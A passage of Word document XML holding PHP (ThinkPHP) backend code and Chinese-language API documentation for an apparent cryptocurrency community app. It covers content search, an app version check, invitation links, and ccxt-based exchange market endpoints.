      </w:r>
    </w:p>
    <w:p w14:paraId="127216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-&gt;whereOr('fullname', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD81B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-&gt;whereOr('fullname_zh', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C51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-&gt;whereOr('introduction_zh', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAF2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-&gt;order('follow_num', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164C5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1FC8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(count($data['coins']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2B9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$quote='USDT';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA261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 = array_column($data['coins'], 'currency');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F54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$symbol_merge = function ($base) use ($quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC99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"$base/$quote";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF57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50B4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 = array_map($symbol_merge, $arr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27B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#$ticker_where['exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B5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$pre_query=Db::name('ticker')-&gt;field('batch_no')-&gt;order('ticker_timestamp desc')-&gt;limit(1)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3268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$ticker_where['symbol'] = ['in', $symbol];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE7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$ticker_where['batch_no'] = $pre_query['batch_no'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDE7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$tickers=Db::name('ticker')-&gt;order('ticker_timestamp desc')-&gt;where($ticker_where)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42389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$attach_icon=function($coin){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11118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$coin['icon']= '/public/coin/icon/' . strtolower($coin['currency']) . '@2x.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B114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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70D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EF40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$data['coins']=array_map($attach_icon, $data['coins']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539545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$attach_ticker=function($coin) use ($tickers, $quote) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A46B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$symbol=$coin['currency'] . '/' .$quote;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB22C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$ticker=array_search($symbol, array_column($tickers, 'symbol'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74696A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if(false===$ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39C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 + ['symbol'=&gt;$symbol, 'last_price'=&gt;0, 'change'=&gt;0, 'percentage'=&gt;0, 'base_volume'=&gt;0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E65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AEA30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 + $tickers[$ticker];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255197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207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$data['coins']=array_map($attach_ticker, $data['coins']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAE6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239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$data['circles'] = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4669D3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-&gt;where('title', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1D8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-&gt;whereOr('content', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616718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4B2FF5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(count($data['circles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E52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($data['circles'] as $key =&gt; $circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37754A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$data['circles'][$key]['img'] = $circle['img'] ? _imgUrl().$circle['img'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A76E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36D1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0D2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$data['platform'] = Db::name('platform')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6FEA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-&gt;where('name', 'like', '%' . $keyword. '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B15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7C155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$keyword_replace=str_replace(' ','%',$keyword);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF07F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 = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B46C0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'like', '%' . $keyword_replace . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14512A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-&gt;whereOr('tags', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D787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-&gt;whereOr('keywords', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F770D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-&gt;whereOr('description', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254EB2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572118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(count($data['articles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6A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($data['articles'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BB26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$data['articles'][$key]['image'] = $article['image'] ? _imgUrl().$article['image'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC69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($article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAD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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8C0A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($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D869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$data['articles'][$key]['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1265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D47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B6D6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$data['articles'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544D9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$data['articles'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A2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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084AB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$article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC541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6764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_user($article['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B20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763DE0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$data['articles'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE415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$data['articles'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E2F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/*$data['articles'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54143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$article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEB7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AB16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$data['articles'][$key]['author_article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D625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$article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F9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081915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$data['articles'][$key]['author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45547F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$article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA82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F3F7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13C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E8AFC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$data['articles'][$key]['zan'] = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FF39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-&gt;where('aid', $article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4217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2894BE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6D5EA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31411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$data['articles'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4A1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$article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADEFA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4739DD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1EC75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6BFE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0FC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6E0B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 = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B390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'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C66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-&gt;whereOr('tags', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA04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-&gt;whereOr('keywords', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC38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-&gt;whereOr('description', 'like', '%' . $keyword . '%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD99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56F57A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(count($data['circle_articles']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F7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($data['circle_articles'] as $key =&gt; $circle_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F917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$data['circle_articles'][$key]['image'] = $circle_article['image'] ? _imgUrl().$circle_article['image'] : '/public/style/index/img/default_circle_logo_52x52.png';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460EF6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($circle_article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CFF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explode(',', $circle_article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5D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($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D683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$data['circle_articles'][$key]['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F30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781D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0D88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$data['circle_articles'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D454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$data['circle_articles'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565FA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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344214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$circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6625E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693B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_user($circle_article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A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470943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$data['circle_articles'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F5B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$data['circle_articles'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5013E5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/*$data['circle_articles'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26452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$circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450AC5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9516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$data['circle_articles'][$key]['author_article_num'] = Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D785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$circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125FF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9CFB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$data['circle_articles'][$key]['author_article_num'] += Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E774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$circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7301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090AE6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2E1B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3DDF09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$data['circle_articles'][$key]['zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088C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$circle_article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B21F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-&gt;where('member_id', $this-&gt;memberId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161C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0FB1F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903AA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$data['circle_articles'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB93E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$circle_article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B08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13F229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C30D9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0263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B567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58A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195297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7A92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575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/api/index/check_version_update </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有版本更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755FF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检查</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有版本更新</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7948CD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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790027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603B2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local_version      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本地的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本号（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F009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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B93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has_update      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否有新版本可供更新：</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19A0FB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latest_version     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE39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latest_version.version          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED38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latest_version.url_for_android  Android APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EB2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latest_version.url_for_ios      iOS APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362C9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latest_version.create_time     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最新的</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> APP </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版本发布时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67325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10F53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6C6A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check_version_update()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3150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F1F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$local_version = input('param.local_version', '', 'trim');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB248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$latest_version = Db::name('version')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3896CD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-&gt;order('id', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4EC8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574AC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F837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'has_update' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879C5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'latest_version' =&gt; $latest_version,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BF6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72D3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($local_version != '' &amp;&amp; $local_version == $latest_version['version']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16376E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$result['has_update'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A37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879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json($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A3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DA72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7615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/api/index/invitation </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取邀请好友链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692981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获取邀请好友链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A29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通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36063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75053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返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9537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invitation_link  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86BC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qrcode_link      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>二维码地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF09E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62EFC2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@apiError {String} errcode            </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误状态码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23032A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7281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invitation()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D77C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BFF6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2712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'invitation_link' =&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3FE7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'qrcode_link' =&gt; '/public/style/index/img/qrcode.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FD5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056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362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930A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B629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014C8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70CCF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think\Hook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211F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064F4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ccxt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9F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Market extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7309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44F4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0F8F34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03EDE8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F0C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2720F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08B2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63AFD7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EE2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2A3F3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796C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683C3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9A8F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6974F1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4652F8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780D35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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC10C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FC12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1E646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0D9EAB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1B2C7E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14F2B5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3E1E9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36E290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2CBBD2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92EB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6B53E1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0BF07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2011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47CE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6DAD4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54147A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30BC65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46A13B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2749E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3EE6F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3D0B28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1B21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E25E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645F9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1573A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122637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5F28BB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8B27B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323DCA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078F33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C6C1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F5F4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0A10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D92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2F955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603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40A6CA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59BAB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639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A538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6B6F2A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CFF2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9863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3147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A273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/api/market/exchange </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支持的交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B30D6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支持的交易所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA30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07BC26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81D5B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5BAC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exchange() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF93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json(\ccxt\Exchange::$exchanges);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED378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B183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14A4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/api/market/exchange_markets </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所市场数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF07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交易所市场数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AB6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5A5A7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C1644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5D4E5A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EF30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exchange_markets()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D09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F268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029783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099D7E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7A127C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4906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368159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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B443F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24511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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5687B1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json($exchange-&gt;markets);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7A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BB06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FC31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/api/market/exchange_symbols </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所交易的交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F96D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交易所交易的交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBD2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342FA6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321A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5CB1E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base </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B6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975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exchange_symbols()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255973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BAAE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5BCEA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2175E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4380C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7963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51DFD1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$base=input('post.base');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128469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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC0F0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DCE0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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AAE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$filter=function($symbol) use ($base){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA84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$pattern="/^$base\/\w+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3947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preg_match($pattern, $symbol)?$symbol:null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63685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1254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($base)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3625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json(array_values(array_filter(array_map($filter, $exchange-&gt;symbols))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DCB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json($exchange-&gt;symbols);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E769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3F7B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7522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/api/market/exchange_currencies </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所所在国家</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC20F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交易所所在国家</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D43B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6106F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393B9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3547F8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14E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exchange_currencies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8B5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0AB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586218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464E0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3A3005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4D9F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 'binance','org\Filter::safeHtml');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE48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$id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D497D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474DEB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$markets = $exchange-&gt;load_markets();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135640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json($exchange-&gt;currencies);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1A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BA5A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33CB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/api/market/ohlcv </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E186E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@apiName </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45C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01A82E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BF973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1BD16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symbol   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68E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timeframe   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间框架（需要先调用【返回交易所时间框架】获取交易所支持哪些时间框架）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACD2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object </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蜡烛</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> [UTC</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
